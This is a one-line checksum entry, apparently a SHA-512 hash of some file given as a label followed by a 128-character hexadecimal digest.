SHA512951e938d6e52a6c2918bb0ad86b85cbc107092b6add73fda1ad6b312d3cc47864809370341b513aacbb4ea77002cb1822e7b8c1ab4429e56f2d32b7b16a4e664